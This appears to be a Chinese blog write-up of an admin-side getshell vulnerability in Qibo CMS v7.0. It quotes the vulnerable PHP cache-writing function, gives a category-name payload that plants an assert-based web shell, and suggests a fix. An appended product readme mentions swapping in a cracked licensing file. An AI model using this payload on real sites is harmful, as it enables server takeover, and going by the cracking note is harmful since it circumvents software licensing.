齐博cmsv7.0后台getshell

前言
预测下,VG要夺冠。加油


0x01 漏洞分析
此漏洞比较鸡肋,需要后台权限。漏洞原理很简单,这里就简单分析一下。
漏洞出现在:inc/class.inc.php中的GuideFidCache函数里

    /*导航条缓存*/
    function GuideFidCache($table,$filename="guide_fid.php",$TruePath=0){
        global $db,$webdb,$pre;
        if($table=="{$pre}sort"&&$webdb[sortNUM]>500){
            return ;
        }
        $show="<?php \r\n";
        //$showindex="<a href='javascript:guide_link(0);' class='guide_menu'>>首页</a>";
        $showindex="<a href='\$webdb[www_url]' class='guide_menu'>>首页</a>";
        $query=$db->query("SELECT fid,name FROM $table ");
        // 带双引号写入变量,并且未过滤。
        while( @extract($db->fetch_array($query)) ){
            $show.="\$GuideFid[$fid]=\"$showindex".$this->SortFather($table,$fid)."\";\r\n";
        }
        $show.=$shows.'?>';
        if($TruePath==1){
            write_file($filename,$show);
        }else{
            write_file(ROOT_PATH."data/$filename",$show);
        }
    }

这个函数主要是将导航条信息写入缓存文件guide_fid.php文件中,但是写入变量使用双引号,因此可以直接构造变量远程执行代码,比如${phpinfo()}。
写入文件成功后,就可以直接访问该文件即可。
0x02 漏洞利用
漏洞利用更为简单,登陆后台增加栏目为${assert($_POST[a])},后门直接写入/data/guide_fid.php文件中,菜刀连之即可。
1.png
2.png
0x03 修复建议
$show变量拼接时使用单引号。


*************************************** 当前程序为“齐博地方生活门户系统”(版本号为V7.0) *************************************** 破解加密办法 替换inc文件夹biz.php,破解文件已打包,请自行替换 注意:对于多城市版并且使用的是IIS服务器,同时想使用多城市二级域名与商铺三级域名的话,请把/home/bak/目录下的3个PHP文件移到根目录,然后在IIS上添加一个空主机头绑定到根目录(IIS只能设置一个空主机头),同时还要添加hy.php为默认主页,并且优先级要高于index.php才可! 后台标签样式的缩略图默认是调用远程官方站的,你可以另外下载,解压对应的放在template/default/目录即可 下载地址:http://down.qibosoft.com/template/default_img.rar 因为IP库比较大,程序默认不带IP库,你可以另外下载,解压后,放在整站/inc/目录即可 http://down.qibosoft.com/ip.rar 部分目录功能说明(可自由修改): \template\default\login_tpl\ 用户登陆样式 \template\default\list_tpl\ 列表页,内容列表排板样式 \template\default\bencandy_tpl\ 内容页,评论表单框样式 \template\default\label_tpl\ 后台更新标签的样式 \template\default\label_tpl\article\ 内容模型私有模板 \template\default\label_tpl\common_title\ 标题公有模板 \template\default\side_tpl\ 列表页,内容页,最新/最热/推荐等样式 \template\default\side_sort\ 列表页,内容页,相关栏目样式 \template\default\tpl\ 图片模型,下载模型,视频模型,商城模型,FLASH模型,产品型模,内容页的私有母模板(非正式使用的模板).如果不存在的话,就使用文章风格. \member\template\post.htm 会员中心,发表文章的风格. \data\member_tpl\ 会员中心图片模型,下载模型,视频模型,商城模型,FLASH模型,产品型模,的发表页模板 \data\admin_tpl\ 后台图片模型,下载模型,视频模型,商城模型,FLASH模型,产品型模,的发表页模板 \data\form_tpl\ 自定义表单模板生成目录 ****************************************************************************************** ****************************************************************************************** 要整合DISCUZ7.0以上论坛版本,必须要设置UC接口. ****************************************************************************************** ****************************************************************************************** 设置方法如下分两步,缺一不可: 1.进UC管理后台,点击'应用管理',再点击'添加新应用',再选择'自定义安装' 应用名称:输入 齐博系统 应用的 URL:输入 http://网站域名/do (注意:结尾不需要/号,并且注意是do结尾!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!) 应用 IP:留空即可 通信密钥:随便写一个,比如123abcdkjhh 应用类型:选择'其它 应用的物理路径:留空即可 查看个人资料页面地址:留空即可 应用接口文件名称:uc.php 标签单条显示模板:留空即可 标签模板标记说明:留空即可 是否开启同步登录:选择'是' 是否接受通知:选择'是' 最后提交,提交之后,再返回到应用列表.然后再选择刚刚提交那个应用,点击编辑. 把'应用的 UCenter 配置信息:'里边的代码复制出来,放到整站/data/uc_config.php的第二行即可. 2.以上是UC的设置,下一步.还要设置与论坛的整合设置,进入整站后台,点击'整合其他系统' 再选择'整合DISCUZ论坛7.X',如果你的不是DZ7.X版,而是DZ X1的话.就不要选择论坛,而选择UC 然后再把里边的每一项设置好.即可
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值